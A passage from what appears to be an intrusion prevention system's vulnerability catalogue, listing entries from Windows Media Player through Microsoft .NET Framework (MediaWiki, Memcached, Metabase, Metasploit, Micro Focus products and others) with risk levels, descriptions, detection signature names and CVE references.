First detected in: sgpkg-ips-347-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft Windows Media Player.
Situation: Generic_CS-Media-Player-Network-Sharing-Service-Code-Execution-CVE-2010-3225
References:
CVE-2010-3225
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3225
MS10-075
http://technet.microsoft.com/security/bulletin/MS10-075
Back to top

Media-Services-Buffer-Overflow-CVE-2010-0478

About this vulnerability: A vulnerability in Microsoft Windows Media Service 4.1
Risk: High
First detected in: sgpkg-ips-300-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Windows Media Service 4.1. When exploited successfully, the vulnerability allows remote code execution.
Situation: Generic_CS-Media-Services-Buffer-Overflow-CVE-2010-0478
Generic_CS-Media-Services-Buffer-Overflow-Exploit-CVE-2010-0478
Generic_UDP-Media-Services-Buffer-Overflow-CVE-2010-0478
References:
CVE-2010-0478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0478
MS10-025
http://technet.microsoft.com/security/bulletin/MS10-025
Back to top

MediaWiki-CSS-Extension-Path-Traversal

About this vulnerability: A vulnerability in Wikimedia Foundation Media Wiki CSS Extension
Risk: Moderate
First detected in: sgpkg-ips-1808-5242
Last changed: sgpkg-ips-1808-5242
Platform: Generic
Software: MediaWiki
Type: Input Validation
Description: Improper handling of backslashes in URL paths when loading stylesheets causes a path traversal vulnerability in MediaWiki. A successful exploitation allows an attacker to access arbitrary files on the target system.
Situation: HTTP_CRL-MediaWiki-CSS-Extension-Path-Traversal
References:
CVE-2024-47841
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47841
Back to top

MediaWiki-Script-Injection

About this vulnerability: Cross-site scripting vulnerability in MediaWiki
Risk: Moderate
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MediaWiki
Type: Cross-site Scripting
Description: The MediaWiki product has a vulnerability in the parsing of user supplied data. Remote attacker is able to exploit this vulnerability to construct cross-site scripting attacks.
Situation: HTTP_CS-MediaWiki-Script-Injection
References:
CVE-2006-2611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2611
OSVDB-25713
http://www.osvdb.org/25713
Back to top

MediaWiki-SyntaxHighlight-Extension-Option-Injection-Vulnerability

About this vulnerability: A MediaWiki SyntaxHighlight Extension Option Injection vulnerability
Risk: Moderate
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux; Mac OS X
Software: MediaWiki
Type: Cross-site Scripting
Description: A vulnerability in MediaWiki SyntaxHighlight Extension, versions 1.27.x and 1.28.x, which allows remote attackers to create arbitrary files and execute arbitrary PHP code by specifying specially crafted options to the Pygments library.
Situation: File-Text_MediaWiki-SyntaxHighlight-Extension-Option-Injection-Vulnerability
References:
CVE-2017-0372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0372
Back to top

MediaWiki-URI-Remote-Command-Execution

About this vulnerability: A MediaWiki URI Remote Command Execution vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-766-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MediaWiki
Type: Metacharacter Injection
Description: A vulnerability in MediaWiki, versions 1.22.x before 1.22.2, 1.21.x before 1.21.5, and 1.19.x before 1.19.11, which allows remote attackers to execute arbitrary commands via shell metacharacters in several URLs, when DjVu or PDF file upload support is enabled.
Situation: HTTP_CSU-MediaWiki-URI-Remote-Command-Execution
References:
CVE-2014-1610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1610
OSVDB-102630
http://www.osvdb.org/102630
Back to top

MegaRAC-Authentication-Bypass-Via-Redfish-CVE-2024-54085

About this vulnerability: An attempt to exploit a vulnerability in MegaRAC detected
Risk: High
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Platform: Generic
Software: MegaRAC
Type: Input Validation
Description: AMI's SPx contains a vulnerability in the BMC where an attacker may bypass authentication remotely through the Redfish Host Interface. A successful exploitation of this vulnerability may lead to a loss of confidentiality, integrity, and/or availability.
Situation: HTTP_CSH-MegaRAC-Authentication-Bypass-Via-Redfish-CVE-2024-54085
References:
CVE-2024-54085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-54085
Back to top

Memcached-Denial-Of-Service

About this vulnerability: A Memcached Denial Of Service vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Memcached
Type: Input Validation
Description: A vulnerability in Memcached, versions 1.4.5 and before, which allows remote attackers to execute arbitrary code, or cause a denial of service, via a large body length value.
Situation: Generic_CS-Memcached-Denial-Of-Service
References:
CVE-2011-4971
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4971
OSVDB-92867
http://www.osvdb.org/92867
Back to top

Memcached-Lru-Mode-And-Temp_TTL-Commands-Denial-of-Service

About this vulnerability: A vulnerability in Memcached
Risk: Moderate
First detected in: sgpkg-ips-1170-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Memcached
Type: Malfunction
Description: There has been reported a denial-of-service vulnerability in Memcached. This vulnerability could be exploited by a remote attacker. Successful exploitation can lead in denial-of-service conditions.
Situation: Generic_CS-Memcached-Lru-Mode-And-Temp_TTL-Commands-Denial-of-Service
References:
CVE-2019-11596
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11596
Back to top

Memcached-Process_Bin_Append_Prepend-Integer-Overflow

About this vulnerability: A vulnerability in Memcached Project Memcached
Risk: Moderate
First detected in: sgpkg-ips-830-5242
Last changed: sgpkg-ips-1392-5242
Platform: Generic
Software: Memcached
Type: Integer Overflow
Description: Improper bounds check when processing append/prepend commands causes an integer overflow vulnerability in memcached. A successful exploitation allows an attacker to run code with the privileges of the daemon or cause a denial of service condition. This situation also covers CVE-2021-2389.
Situation: Generic_CS-Memcached-Process_Bin_Append_Prepend-Integer-Overflow
References:
CVE-2016-8704
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8704
Back to top

Memcached-Process_Bin_SASL_Auth-Integer-Underflow

About this vulnerability: A vulnerability in Memcached Project Memcached
Risk: Moderate
First detected in: sgpkg-ips-830-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Memcached
Type: Integer Overflow
Description: Improper checking of client commands when processing append/prepend commands causes an integer overflow vulnerability in memcached. A successful exploitation allows an attacker to run code with the privileges of the daemon or cause a denial of service condition.
Situation: Generic_CS-Memcached-Process_Bin_SASL_Auth-Integer-Underflow
References:
CVE-2016-8706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8706
Back to top

Memcached-Process_Bin_Update-Body_Len-Integer-Overflow

About this vulnerability: A vulnerability in Memcached Project Memcached
Risk: Moderate
First detected in: sgpkg-ips-825-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Memcached
Type: Integer Overflow
Description: Improper validation of length values in client commands causes an integer overflow in the memcached daemon. This can allow an attacker to execute code or cause a denial of service condition on the target.
Situation: Generic_CS-Memcached-Process_Bin_Update-Body_Len-Integer-Overflow
References:
CVE-2016-8705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8705
Back to top

Memcached-Traffic-Amplification-UDP-Packet-Spoofing

About this vulnerability: A vulnerability in Memcached Project Memcached
Risk: Moderate
First detected in: sgpkg-ips-1054-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Memcached
Type: Malfunction
Description: There has been reported a network traffic amplification vulnerability in memcached. Memcached is listening on UDP port 11211 by default. A remote attacker can launch DoS attacks by sending UDP packets with spoofed source addresses to UDP port of the target server.
Situation: Generic_UDP-Memcached-Traffic-Amplification-UDP-Packet-Spoofing
References:
CVE-2018-1000115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000115
Back to top

Memcached-Try_Read_Command_Binary-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Memcached Project Memcached
Risk: Moderate
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Memcached
Type: Buffer Overflow
Description: There has been reported a stack buffer overflow vulnerability in memcached. Successful exploitation could lead in arbitrary code execution.
Situation: Generic_CS-Memcached-Try_Read_Command_Binary-Stack-Buffer-Overflow
References:
CVE-2020-10931
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10931
Back to top

Memcached-Usage

About this vulnerability: Use of memcached detected
Risk: Moderate
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Memcached
Type: Insecure Configuration
Description: Memcached is a distributed memory caching system which is often used to speed up databases.
Situation: Generic_CS-Memcached-Set-Request
Generic_CS-Memcached-Add-Request
Generic_CS-Memcached-Get-Request
Generic_SS-Memcached-Server-Error-Response
Back to top

Mercantec-SoftCart-Cgi-Buffer-Overflow

About this vulnerability: Buffer overflow in Mercantec SoftCart.exe
Risk: High
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1637-5242
Platform: BSD
Software: Mercantec SoftCart
Type: Buffer Overflow
Description: The Mercantec SoftCart CGI executable is prone to a remotely exploitable buffer overflow. This may allow arbitrary code execution in the context of the hosting Web server. The issue is known to affect version 4.00b on BSDi/4.3 systems. Other releases may also be affected.
References:
CVE-2004-2221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2221
BID-10926
http://www.securityfocus.com/bid/10926
OSVDB-9011
http://www.osvdb.org/9011
Back to top

Mercury-Mail-Multiple-IMAP-Commands-BOF

About this vulnerability: Multiple IMAP commands buffer overflows in Mercury Mail
Risk: Moderate
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mercury Mail Transport System
Type: Buffer Overflow
Description: Mercury Mail Transport System is vulnerable to a Denial of Service (DoS) attack, caused by a buffer overflow when handling certain commands. By supplying a specially-crafted command, such as: EXAMINE, SUBSCRIBE, STATUS, APPEND, CHECK, CLOSE, EXPUNGE, FETCH, DELETE, RENAME, LIST, SEARCH, CREATE and UNSUBSCRIBE, a remote attacker could overflow the buffer and cause the server to crash.
Situation: IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Examine-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Select-Command
IMAP_Excessively-Long-Username-Argument-In-IMAP-Login-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Status-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Create-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Subscribe-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Rename-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Append-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Unsubscripe-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Delete-Command
References:
CVE-2004-1211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1211
BID-11775
http://www.securityfocus.com/bid/11775
OSVDB-12508
http://www.osvdb.org/12508
Back to top

Metabase-GeoJSON-URL-Local-File-Inclusion

About this vulnerability: A vulnerability in Metabase
Risk: Moderate
First detected in: sgpkg-ips-1799-5242
Last changed: sgpkg-ips-1799-5242
Platform: Generic
Software: Metabase
Type: Input Validation
Description: Improper URL validation causes a local file inclusion vulnerability in the GeoJSON component of Metabase.
Situation: HTTP_CRL-Metabase-GeoJSON-URL-Local-File-Inclusion
References:
CVE-2021-41277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41277
Back to top

Metabase-Remote-Code-Execution-CVE-2023-38646

About this vulnerability: A vulnerability in Metabase
Risk: High
First detected in: sgpkg-ips-1617-5242
Last changed: sgpkg-ips-1617-5242
Platform: Generic
Software: Metabase
Type: Input Validation
Description: A pre-authentication remote code execution vulnerability has been reported in Metabase Open Source and Metabase Enterprise.
Situation: File-Text_Metabase-Remote-Code-Execution-CVE-2023-38646
References:
CVE-2023-38646
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38646
Back to top

Metamail-Format-String-Vulnerabilities

About this vulnerability: A vulnerability in Metamail MetaMail
Risk: Moderate
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Metamail
Type: Format String
Description: Several vulnerabilities in MetaMail, a common MIME parser and application launcher for email clients, may allow remote attackers to execute arbitrary code. These vulnerabilities include two buffer overflows and two format-string issues. A successful attack will cause the metamail executable to terminate, or to execute code of the attack's choice in the execution context of metamail (usually inherited from the MUA, which in most cases runs with the user's credentials).
Situation: E-Mail_HCS-Mail-To-Format-String
E-Mail_HCS-Mail-From-Format-String
References:
CVE-2004-0104
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0104
BID-9692
http://www.securityfocus.com/bid/9692
Back to top

Metasploit-Handler-DoS

About this vulnerability: A vulnerability in Metasploit
Risk: High
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Metasploit
Type: Resource Starvation
Description: There exists a vulnerability in Metasploit, version 5.0.20, which allows remote attackers to cause a denial of service condition by sending a specially crafted HTTP request that gets added as a resource handler.
Situation: HTTP_CSU-Metasploit-Handler-DoS
References:
CVE-2019-5645
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5645
Back to top

Metasploit-JavaScript-Encryption

About this vulnerability: An HTML obfuscation method used by Metasploit detected
Risk: Low
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP client
Type: Malfunction
Description: HTML content that could be generated by Metasploit's EncryptJS obfuscation method was detected
Situation: HTTP_SS-Metasploit-JavaScript-Encryption
File-Text_Metasploit-JavaScript-Encryption
Back to top

Metasploit-JavaScript-Escape-Evasion

About this vulnerability: An HTML evasion method used by Metasploit detected
Risk: Low
First detected in: sgpkg-ips-399-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP client
Type: Malfunction
Description: HTML content that could be generated by Metasploit's HTML::javascript::escape evasion was detected
Situation: HTTP_SS-Metasploit-JavaScript-Escape-Evasion
File-Text_Metasploit-JavaScript-Escape-Evasion
Back to top

Metasploit-msfd-Browser-Remote-Code-Execution

About this vulnerability: A vulnerability in Metasploit msfd
Risk: High
First detected in: sgpkg-ips-1127-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Metasploit
Type: Input Validation
Description: A vulnerability in Metasploit msfd which allows remote attackers to connect to the msfd-socket through a victim's browser and execute msfconsole-commands.
Situation: File-Text_Metasploit-msfd-Browser-Remote-Code-Execution
Back to top

Metasploit-msfd-Remote-Code-Execution

About this vulnerability: A Metasploit msfd Remote Code Execution Vulnerability
Risk: High
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Metasploit
Type: Input Validation
Description: A vulnerability in the msfd-service of Metasploit which allows remote attackers to execute arbitrary code via the msfconsole command: irb -e <CODE>.
Situation: Generic_CS-Metasploit-msfd-Remote-Code-Execution
Back to top

Metersphere-V1.15.4-Authenticated-SQL-Injection

About this vulnerability: An attempt to exploit a vulnerability in MeterSphere v1.15.4 Authenticated SQL Injection detected
Risk: High
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Platform: Generic
Software: Metersphere
Type: Malfunction
Description: An attempt to exploit a vulnerability in MeterSphere v1.15.4 Authenticated SQL Injection detected.
Situation: HTTP_CRL-Metersphere-V1.15.4-Authenticated-SQL-Injection
References:
CVE-2021-45788
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45788
Back to top

MGI-LPViewer-LPControl-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in MGI LPViewer LPControl ActiveX control
Risk: High
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MGI Systems LPViewer; iseemedia LPViewer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the MGI Systems LPViewer LPControl ActiveX control. The vulnerability is due to an error in a particular method exposed by the ActiveX control that suffers insufficient input validation. An exploitation may lead to arbitrary code execution in the context of the current user.
Situation: HTTP_SS-MGI-LPViewer-LPControl-ActiveX-Control-Buffer-Overflow
File-Text_MGI-LPViewer-LPControl-ActiveX-Control-Buffer-Overflow
References:
CVE-2009-4384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4384
BID-31604
http://www.securityfocus.com/bid/31604
OSVDB-48946
http://www.osvdb.org/48946
Back to top

Micro-Focus-Groupwise-Admin-Console-Cross-Site-Scripting

About this vulnerability: A vulnerability in Micro Focus GroupWise
Risk: Moderate
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Micro Focus GroupWise
Type: Input Validation
Description: Insufficient validation of URL parameters results in a cross-site scripting vulnerability in Micro Focus GroupWise. A successful exploitation allows an attacker to run arbitrary scripts in the user's browser.
Situation: HTTP_CRL-Micro-Focus-Groupwise-Admin-Console-Cross-Site-Scripting
References:
CVE-2016-5760
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5760
Back to top

Micro-Focus-Groupwise-Post-Office-Agent-Integer-Overflow

About this vulnerability: A vulnerability in Micro Focus GroupWise
Risk: Moderate
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Micro Focus GroupWise
Type: Integer Overflow
Description: Improper parsing of HTTP requests causes an integer overflow in Micro Focus GroupWise. A successful exploit allows an attacker to run arbitrary code on the target system.
Situation: HTTP_CRL-Micro-Focus-Groupwise-Post-Office-Agent-Integer-Overflow
References:
CVE-2016-5762
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5762
Back to top

Micro-Focus-NetIQ-Access-Manager-Identity-Server-Directory-Traversal

About this vulnerability: A vulnerability in Micro Focus NetIQ Access Manager
Risk: Moderate
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Micro Focus NetIQ Access Manager
Type: Directory Traversal
Description: Insufficient validation of URL parameters causes a directory traversal vulnerability in Micro Focus NetIQ Access Manager. A successful exploit allows an attacker to access arbitrary files on the target system.
Situation: HTTP_CRL-Micro-Focus-NetIQ-Access-Manager-Identity-Server-Ospuibasicssodownload-Directory-Traversal
References:
CVE-2017-14803
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14803
Back to top

Micro-Focus-NetIQ-Sentinel-Server-Reportviewservlet-Directory-Traversal

About this vulnerability: A vulnerability in Micro Focus NetIQ Sentinel
Risk: Moderate
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Micro Focus NetIQ Sentinel
Type: Directory Traversal
Description: Improper file name parameter validation in the Micro Focus NetIQ Sentinel Server causes a directory traversal vulnerability, which when successfully exploited can allow an attacker to read arbitrary files on the target system.
Situation: HTTP_CRL-Micro-Focus-NetIQ-Sentinel-Server-Reportviewservlet-Directory-Traversal
References:
CVE-2016-1605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1605
Back to top

Micro-Focus-NetIQ-Sentinel-Server-Sentinelcontext-Authentication-Bypass

About this vulnerability: A vulnerability in Micro Focus NetIQ Sentinel
Risk: Moderate
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Micro Focus NetIQ Sentinel
Type: Malfunction
Description: Improper handling of authentication cookies results in an authentication bypass vulnerability which allows an attacker to gain administrative privileges on the target server by means of a crafted HTTP request.
Situation: HTTP_CS-Micro-Focus-NetIQ-Sentinel-Server-Sentinelcontext-Authentication-Bypass
References:
CVE-2016-1605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1605
Back to top

Micro-Focus-Operations-Bridge-Manager-Authenticated-RCE

About this vulnerability: A vulnerability in Micro Focus Operations Bridge Manager
Risk: High
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Platform: Generic
Software: Micro Focus Operations Bridge Manager
Type: Input Validation
Description: There exists a vulnerability in Micro Focus Operations Bridge Manager, versions 2020.05 and before, and multiple other Micro Focus products, which allows remote attackers to execute arbitrary code via an authenticated Java deserialization.
Situation: HTTP_CRL-Micro-Focus-Operations-Bridge-Manager-Authenticated-RCE
References:
CVE-2020-11853
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11853
Back to top

Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection

About this vulnerability: A vulnerability in Micro Focus Operations Bridge Manager.
Risk: High
First detected in: sgpkg-ips-1366-5242
Last changed: sgpkg-ips-1366-5242
Platform: Unix
Software: Micro Focus Operations Bridge Manager
Type: Input Validation
Description: A vulnerability in Micro Focus Operations Bridge Manager, versions 10.40 and before, which allows remote attackers to execute arbitrary commands via the userName parameter during login, due to insufficient user input validation.
Situation: HTTP_CRL-Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection
References:
CVE-2021-22502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22502
Back to top

Micro-Focus-Rumba-Walldata.macro-Playmacro-Memory-Corruption

About this vulnerability: A vulnerability in Micro Focus Rumba
Risk: Moderate
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Micro Focus Rumba
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in WallData.Macro ActiveX control of Micro Focus Rumba. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Micro-Focus-Rumba-Walldata.macro-Playmacro-Memory-Corruption
Back to top

Micro-Focus-Secure-Messaging-Gateway-Command-Injection

About this vulnerability: A vulnerability in Micro Focus Secure Messaging Gateway
Risk: High
First detected in: sgpkg-ips-1285-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Micro Focus Secure Messaging Gateway
Type: Input Validation
Description: There exists a vulnerability in Micro Focus Secure Messaging Gateway, prior to July 2020 release, which allows remote attackers to execute arbitrary commands due to improper validation of the SaveData parameter within the manage_domains_save_data.json.php.
Situation: HTTP_CRL-Micro-Focus-Secure-Messaging-Gateway-Command-Injection
References:
CVE-2020-11852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11852
Back to top

Micro-Focus-Secure-Messaging-Gateway-Enginelist.php-SQL-Injection

About this vulnerability: A vulnerability in Micro Focus Secure Messaging Gateway
Risk: Moderate
First detected in: sgpkg-ips-1100-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Micro Focus Secure Messaging Gateway
Type: Input Validation
Description: There has been reported a SQL injection vulnerability in Micro Focus Secure Messaging Gateway. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target service. Successful exploitation can result execution of arbitrary SQL queries.
Situation: HTTP_CRL-Micro-Focus-Secure-Messaging-Gateway-Enginelist.php-SQL-Injection
References:
CVE-2018-12464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12464
Back to top

Micro-Focus-UCMDB-Java-Deserialization-Unauthenticated-RCE

About this vulnerability: A vulnerability in Micro Focus Operations Bridge Manager
Risk: High
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Platform: Windows; Linux
Software: Micro Focus Operations Bridge Manager
Type: Input Validation
Description: There exists a vulnerability in Micro Focus Operations Bridge Manager, versions 2020.05 and before, which allows remote attackers to execute arbitrary code via a hardcoded password CVE-2020-11853 and Java deserialization CVE-2020-11854 using certain services.
Situation: HTTP_CRL-Micro-Focus-UCMDB-Java-Deserialization-Unauthenticated-RCE
References:
CVE-2020-11853
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11853
Back to top

Microsoft-.NET-FormatFtpCommand-Crlf-Injection-Arbitrary-File-Write-And-Deletion

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: High
First detected in: sgpkg-ips-1695-5242
Last changed: sgpkg-ips-1695-5242
Platform: Windows
Software: Microsoft .NET Framework; Microsoft Visual Studio
Type: Input Validation
Description: An arbitrary file write and deletion vulnerability has been reported in the Microsoft .NET Framework and Visual Studio. An attacker could exploit this vulnerability by sending malicious request to the FTP servers. Successful exploitation could allow the attacker write or delete files in the context of the FTP server.
Situation: FTP_Pipeline-Detected
References:
CVE-2023-36049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36049
ms23-nov
http://technet.microsoft.com/security/bulletin/ms23-nov
Back to top

Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: Moderate
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Malfunction
Description: There exists a security feature bypass vulnerability in Microsoft .NET Framework.
Situation: File-OLE_Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass
File-RTF_Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass
File-TextId_Microsoft-.NET-Framework-CVE-2015-6115-ASLR-Security-Bypass
References:
CVE-2015-6115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6115
MS15-118
http://technet.microsoft.com/security/bulletin/MS15-118
Back to top

Microsoft-.NET-Framework-Heap-Corruption-CVE-2012-0015

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: Moderate
First detected in: sgpkg-ips-818-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Buffer Overflow
Description: There exists a heap corruption vulnerability in Microsoft's .NET Framework. A remote attacker could use this to execute arbitrary code on the affected system.
Situation: File-TextId_Microsoft-.NET-Framework-Heap-Corruption-CVE-2012-0015
References:
CVE-2012-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0015
OSVDB-79261
http://www.osvdb.org/79261
MS12-016
http://technet.microsoft.com/security/bulletin/MS12-016
Back to top

Microsoft-.NET-Framework-Improper-Execution-Of-Function-Pointer

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: Moderate
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Malfunction
Description: A code execution vulnerability has been reported in Microsoft's .NET Framework. The vulnerability is due to improper execution of a function pointer. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to access a malicious web page. This may result in code execution in the context of the affected user. If code execution is unsuccessful, the affected application may terminate abnormally.
Situation: File-Exe_Microsoft-.NET-Framework-Improper-Execution-Of-Function-Pointer
File-TextId_Microsoft-.NET-Framework-Improper-Execution-Of-Function-Pointer
References:
CVE-2012-1855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1855
OSVDB-82859
http://www.osvdb.org/82859
MS12-038
http://technet.microsoft.com/security/bulletin/MS12-038
Back to top

Microsoft-.NET-Framework-Information-Disclosure-CVE-2024-29059

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: High
First detected in: sgpkg-ips-1833-5242
Last changed: sgpkg-ips-1833-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Malfunction
Description: An information disclosure vulnerability has been reported in Microsoft .NET framework. An unauthenticated attacker can use this vulnerability to leak internal object URIs via crafted HTTP requests.
Situation: HTTP_CSH-Microsoft-.NET-Framework-Information-Disclosure-CVE-2024-29059
References:
CVE-2024-29059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29059
ms24-jan
http://technet.microsoft.com/security/bulletin/ms24-jan
Back to top

Microsoft-.NET-Framework-Proxy-Auto-Discovery-Code-Execution

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: High
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Malfunction
Description: An code execution vulnerability has been reported in Microsoft .NET Framework. The vulnerability is due to the way the framework handles the proxy auto-configuration JavaScript. A remote unauthenticated attacker can exploit this vulnerability by spoofing a proxy auto-configuration (PAC) file location or contents, using techniques such as ARP cache poisoning on local network, NetBios Name Service (NBNS) spoofing, or DNS spoofing; or use social engineering to entice the user to use the malicious PAC URL. The attacker could craft PAC JavaScript code in such a way that it executes restricted code with full access permissions of the currently logged in user.
Situation: File-Text_Microsoft-.NET-Framework-Proxy-Auto-Discovery-Code-Execution
References:
CVE-2012-4776
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4776
BID-56463
http://www.securityfocus.com/bid/56463
OSVDB-87266
http://www.osvdb.org/87266
MS12-074
http://technet.microsoft.com/security/bulletin/MS12-074
Back to top

Microsoft-.NET-Framework-S.DS.P-Namespace-Method-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft .NET Framework
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Buffer Overflow
Description: A buffer overflow exists in the System.DirectoryServices.Protocols (S.DS.P) namespace method in the .NET framework. The vulnerability is due to an error in the validation of the size of objects in memory prior to copying them into an array. An attacker can remotely exploit this vulnerability by enticing a user to open a web page containing a specially crafted XBAP (XAML browser application). In addition, this vulnerability can also be exploited locally by a logged-in user to escape Windows Code Access Security (CAS) Restrictions. Successful remote exploitation would allow arbitrary code execution in the context of the logged-in user.
